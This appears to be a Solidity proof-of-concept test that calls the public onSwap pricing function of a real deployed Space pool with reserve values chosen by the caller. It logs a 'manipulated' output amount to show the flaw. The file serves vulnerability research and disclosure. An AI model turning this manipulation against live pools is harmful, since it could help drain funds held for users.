// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;

import "ds-test/test.sol";

interface IERC20 {
    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);
}

interface ISpace {
      function onSwap(
        SwapRequest memory request,
        uint256 reservesTokenIn,
        uint256 reservesTokenOut
    ) external  returns (uint256) ;
    struct SwapRequest {
        IVault.SwapKind kind;
        IERC20 tokenIn;
        IERC20 tokenOut;
        uint256 amount;
        // Misc data
        bytes32 poolId;
        uint256 lastChangeBlock;
        address from;
        address to;
        bytes userData;
    }
}

interface IVault{
    enum SwapKind { GIVEN_IN, GIVEN_OUT }

}


contract ContractTest is DSTest {
    ISpace  space   = ISpace(0x3f9FEe026fCebb40719A69416C72B714d89a17d9);
    IVault.SwapKind kind = IVault.SwapKind(0);
    ISpace.SwapRequest aad = ISpace.SwapRequest(kind ,IERC20(0x3f9FEe026fCebb40719A69416C72B714d89a17d9),IERC20(0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0),2000000000000000000,0x3f9fee026fcebb40719a69416c72b714d89a17d900020000000000000000017c,15017009,address(this),address(this),'');
 
    function testExample() public {
    //onswap:reservesTokenIn, reservesTokenOut;
    emit log_named_uint("Amount Calculated:", space.onSwap(aad,60000000000000000000000000000000,20000000000000000000000000));   //744039785002747962
    emit log_named_uint("Manipulated Amount Calculated:", space.onSwap(aad,2000000000000000000,2000000000000000000));           //1860147027671744844

    }




}
